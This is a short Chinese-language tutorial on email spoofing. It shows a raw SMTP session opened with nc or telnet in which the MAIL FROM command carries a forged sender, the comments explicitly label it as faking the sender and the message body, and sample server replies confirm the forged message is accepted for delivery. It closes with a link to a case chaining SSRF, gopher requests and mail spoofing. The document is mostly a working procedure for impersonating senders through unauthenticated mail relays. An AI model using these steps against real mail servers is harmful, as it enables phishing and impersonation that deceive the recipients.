邮件伪造
1. 建立TCP连接
SMTP 协议是的默认端口 25,可以使用 telnet 或 nc 直接连接,推荐nc
> telnet domain/ip port
> nc domain/ip port
返回状态 220 即为连接成功
220 ***************************************************************************
2. HELO & EHLO
目前测试中,并不需要此步骤,翻阅文档也没有相关提及
HELO
RFC 5321:
A client SMTP SHOULD start an SMTP session by issuing the EHLO command.
In any event, a client MUST issue HELO or EHLO before starting a mail transaction.
HELO命令是用来向客户端标识自己的身份,这个身份不需要认证可以随意伪造
EHLO example.com
250-spam.xxx.com Hello [***.**.**.***], pleased to meet you
EHLO
属于Extended SMTP(ESMTP) Commands
,EHLO 可以用来取代 HELO,并且会返回支持的各种扩展的列表。
EHLO example.com
250-spam.xxx.com Hello [***.**.**.***], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-AUTH LOGIN PLAIN
250-XXXXXXXXA
250 XXXB
MAIL FROM
向邮件服务器声明邮件发送人地址,在这里伪造发送方邮箱地址,成功状态250
MAIL FROM:[email protected]
250 2.1.0 [email protected]... Sender ok
RCPT TO
声明邮件接收人,如果查询的是一个真实的 Email 地址,返回成功状态250
RCPT TO:[email protected]
250 2.1.5 [email protected]... Recipient ok
DATA
邮件正文,发送此命令向邮件服务器声明自己准备发送邮件正文请接收,等待输入状态354,结束命令为单行键入.后回车
DATA
354 Enter mail, end with "." on a line by itself
test_data
.
250 2.0.0 x26DQlgx047262 Message accepted for delivery
QUIT
请求退出,并断开 TCP 连接
QUIT
221 2.0.0 spam.xxx.com closing connection
完整流程
非认证下
root@debian:~# nc ip port
220 ***************************************************************************
HELO mail.example.com # 可以忽略此命令
250 spam.example.com Hello [***.**.**.***], pleased to meet you
MAIL FROM: # 伪造发送人
250 2.1.0 [email protected]... Sender ok
RCPT TO:, # 确定接收人
250 2.1.5 [email protected]... Recipient ok
RCPT TO:[email protected] # 为展示无法解析的邮箱情况
450 4.4.0 [email protected]... Relaying temporarily denied. Cannot resolve PTR record for ***.**.**.***
DATA # 伪造邮件内容
354 Enter mail, end with "." on a line by itself
test # 邮件正文
. # 结束正文输入
250 2.0.0 x26DQlh0047262 Message accepted for delivery
QUIT # 退出
221 2.0.0 spam.xxx.com closing connection
经典案例
文章链接:HackerTarget SSRF + Location重定向 + gopher Mutiline Request + 邮件伪造